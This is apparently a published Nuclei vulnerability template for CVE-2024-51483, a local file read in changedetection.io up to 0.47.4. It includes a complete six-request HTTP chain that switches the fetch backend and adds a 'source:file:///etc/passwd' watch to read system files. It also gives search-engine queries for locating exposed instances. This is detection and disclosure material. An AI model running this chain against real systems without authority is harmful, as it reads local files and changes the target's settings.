Changedetection.io <= 0.47.4 - Path Traversal

ID: CVE-2024-51483

Severity: medium

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,changedetection,lfi

Description

changedetection.io is free, open source web page change detection software. Prior to version 0.47.5, when a WebDriver is used to fetch files, source-file-///etc/passwd can be used to retrieve local system files, where the more traditional file-///etc/passwd gets blocked. Version 0.47.5 fixes the issue.

YAML Source

id: CVE-2024-51483

info:
  name: Changedetection.io <= 0.47.4 - Path Traversal
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    changedetection.io is free, open source web page change detection software. Prior to version 0.47.5, when a WebDriver is used to fetch files, `source-file-///etc/passwd` can be used to retrieve local system files, where the more traditional `file-///etc/passwd` gets blocked. Version 0.47.5 fixes the issue.
  reference:
    - https://github.com/advisories/GHSA-cwgg-57xj-g77r
    - https://github.com/dgtlmoon/changedetection.io/blob/master/changedetectionio/model/Watch.py#L19
    - https://github.com/dgtlmoon/changedetection.io/blob/master/changedetectionio/processors/__init__.py#L35
    - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-cwgg-57xj-g77r
    - https://github.com/user-attachments/files/17591630/CL-ChangeDetection.io.Path.Travsersal-311024-181039.pdf
  classification:
    cve-id: CVE-2024-51483
    cwe-id: CWE-22
    epss-score: 0.00065
    epss-percentile: 0.3006
    cpe: cpe:2.3:a:changedetection:changedetection:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 6
    vendor: changedetection
    product: changedetection
    shodan-query: http.title:"change detection"
    fofa-query: title="change detection"
    google-query: intitle:"change detection"
  tags: cve,cve2024,changedetection,lfi

http:
  - raw:
      - |
        GET /settings HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: csrf
        part: body
        group: 1
        regex:
          - 'name="csrf_token" value="(.*)?"'
        internal: true

  - raw:
      - |
        POST /settings HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf_token={{csrf}}&requests-time_between_check-weeks=&requests-time_between_check-days=&requests-time_between_check-hours=3&requests-time_between_check-minutes=&requests-time_between_check-seconds=&requests-jitter_seconds=0&application-filter_failure_notification_threshold_attempts=6&application-password=&application-rss_hide_muted_watches=y&application-pager_size=50&application-notification_urls=&application-notification_title=ChangeDetection.io+Notification+-+%7B%7Bwatch_url%7D%7D&application-notification_body=%7B%7Bwatch_url%7D%7D+had+a+change.%0D%0A---%0D%0A%7B%7Bdiff%7D%7D%0D%0A---%0D%0A&application-notification_format=Text&application-base_url=&application-fetch_backend=html_webdriver&application-webdriver_delay=&requests-default_ua-html_requests=Mozilla%2F5.0+%28X11%3B+Linux+x86_64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F87.0.4280.66+Safari%2F537.36&requests-default_ua-html_webdriver=&application-ignore_whitespace=y&application-global_subtractive_selectors=&application-global_ignore_text=&application-api_access_token_enabled=y&requests-extra_proxies-0-proxy_name=&requests-extra_proxies-0-proxy_url=&requests-extra_proxies-1-proxy_name=&requests-extra_proxies-1-proxy_url=&requests-extra_proxies-2-proxy_name=&requests-extra_proxies-2-proxy_url=&requests-extra_proxies-3-proxy_name=&requests-extra_proxies-3-proxy_url=&requests-extra_proxies-4-proxy_name=&requests-extra_proxies-4-proxy_url=&requests-extra_browsers-0-browser_name=&requests-extra_browsers-0-browser_connection_url=&requests-extra_browsers-1-browser_name=&requests-extra_browsers-1-browser_connection_url=&requests-extra_browsers-2-browser_name=&requests-extra_browsers-2-browser_connection_url=&requests-extra_browsers-3-browser_name=&requests-extra_browsers-3-browser_connection_url=&requests-extra_browsers-4-browser_name=&requests-extra_browsers-4-browser_connection_url=&save_button=Save

    skip-variables-check: true

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: csrf2
        part: body
        group: 1
        regex:
          - 'name="csrf_token" value="(.*)?"'
        internal: true

  - raw:
      - |
        POST /form/add/quickwatch HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf_token={{csrf2}}&url=source%3Afile%3A%2F%2Fetc%2Fpasswd&tags=&watch_submit_button=Watch&processor=text_json_diff

    matchers:
      - type: dsl
        dsl:
          - "status_code==302"
        internal: true

  - raw:
      - |
        GET /?{{wait_for(9)}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: uuid
        part: body
        group: 1
        regex:
          - '/etc/passwd"><\/a>\n.*?uuid=(.*?)"'
        internal: true

  - raw:
      - |
        GET /preview/{{uuid}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains(body,'root:x:0')"
          - "contains(content_type,'text/html')"
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022044f4e0a72bb76a68680ca9590942d6ad5831400689e08a5782c6a32c9b22d4fc022100ee37c70b55ef0525ab4c7381ff4b2d21c467a25168ef664081955e46a6bc49ef:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-51483.yaml"

View on Github